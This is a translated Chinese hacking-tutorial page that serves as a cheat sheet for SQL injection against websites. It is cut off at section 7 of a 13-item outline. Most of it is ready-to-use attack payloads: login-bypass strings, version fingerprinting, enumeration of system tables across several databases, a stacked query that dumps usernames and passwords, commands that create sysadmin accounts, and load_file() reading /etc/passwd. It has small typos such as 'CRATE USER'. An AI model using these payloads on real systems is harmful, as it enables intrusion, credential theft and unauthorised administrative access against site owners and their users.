黑客技术研究: SQL注入技术资料
易管天下 www.egtx.net 来源:网摘
文章备注:好像1ST也有翻译过,所以有必要说明下。此翻译文章由尘埃为落叶纷飞翻译,首发脚本安全小组社区(Http://Www.Cnsst.Org),转载还望说明。由于小组成员尘埃工作太忙,由我代发到邪八。
1. 介绍
2. 漏洞测试
3. 收集信息
4. 数据类型
5. 获取密码
6. 创建数据库帐号
7. MYSQL操作系统交互作用
8. 服务器名字与配置
9. 从注册表中获取VNC密码
10.逃避标识部分信号
11.用Char()进行MYSQL输入确认欺骗
12.用注释逃避标识部分信号
13.没有引号的字符串
1. 当服务器只开了80端口,我们几乎肯定管理员会为服务器打补丁。
最好的方法就是转到网站攻击。SQL注射是最普遍的网站攻击方法之一。
你攻击网站程序,(ASP,JSP,Php,CGI..)比服务器或者在服务器上运行的操作系统好的多。
SQL注射是一种通过网页输入一个查询命令或者一条指令进行欺骗的方法,很多站点都是从用户的用户名,密码甚至email获取用户的参数。
他们都使用SQL查询命令。
2. 首先你用简单的进行尝试。
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
这些是简单的方法,其他如下:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
3.收集信息
- ' or 1 in (select @@version)--
- ' union all select @@version-- /*这个优秀
这些能找到计算机,操作系统,补丁的真实版本。
4.数据类型
Oracle 扩展
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL 数据库, C:WINDOWS>type my.ini得到root密码
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5.获取密码
';begin declare @var varchar(8000) set @var=':' select
@var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
6.创建数据库帐号
10. MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin' 加为数据库管理员
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONnecT TO name;
GRANT RESOURCE TO name;
7. MYSQL操作系统交互作用
- ' union select 1,load_file('/etc/passwd'),1,1,1; 这里用到load_file()函数